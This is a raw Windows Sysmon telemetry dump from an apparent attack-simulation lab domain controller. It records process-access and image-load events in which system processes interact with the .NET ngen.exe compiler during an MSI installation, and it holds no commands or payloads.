14:57:20.218{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-D90B-00000000BB01}6392c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.218{A7A01FEF-EBD0-607E-D90B-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.218{A7A01FEF-EBCF-607E-C10B-00000000BB01}3984436C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-DB0B-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.202{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-DB0B-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.202{A7A01FEF-EBCF-607E-BE0B-00000000BB01}68565768C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{A7A01FEF-EBD0-607E-DB0B-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+3d7ae(wow64)|UNKNOWN(0000000001904853)|UNKNOWN(0000000001904504)|UNKNOWN(0000000001902103)|UNKNOWN(0000000001900F66)|UNKNOWN(0000000001900950)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+f036(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+122da(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1859b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1992d7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1bb7fa(wow64) 10341000x800000000000000073645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.186{A7A01FEF-EBD0-607E-DA0B-00000000BB01}49602528C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-D90B-00000000BB01}6392c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.186{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-DA0B-00000000BB01}4960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.171{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-D90B-00000000BB01}6392c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.171{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-D90B-00000000BB01}6392c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.171{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-D70B-00000000BB01}5780c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.171{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-D70B-00000000BB01}5780c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.171{A7A01FEF-EBD0-607E-D70B-00000000BB01}5780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.155{A7A01FEF-EBD0-607E-D80B-00000000BB01}30085296C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-D70B-00000000BB01}5780c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.140{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-D80B-00000000BB01}3008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.140{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-D70B-00000000BB01}5780c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.140{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-D70B-00000000BB01}5780c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.124{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-D50B-00000000BB01}4444c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.124{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-D50B-00000000BB01}4444c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.124{A7A01FEF-EBD0-607E-D50B-00000000BB01}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.108{A7A01FEF-EBD0-607E-D60B-00000000BB01}54245248C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-D50B-00000000BB01}4444c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.093{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-D60B-00000000BB01}5424C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.093{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-D50B-00000000BB01}4444c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.093{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-D50B-00000000BB01}4444c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.077{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-D30B-00000000BB01}4032c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.077{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-D30B-00000000BB01}4032c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.077{A7A01FEF-EBD0-607E-D30B-00000000BB01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.061{A7A01FEF-EBD0-607E-D40B-00000000BB01}19801196C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-D30B-00000000BB01}4032c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.061{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-D40B-00000000BB01}1980C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.046{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-D30B-00000000BB01}4032c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.046{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-D30B-00000000BB01}4032c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.046{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-D10B-00000000BB01}6772c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 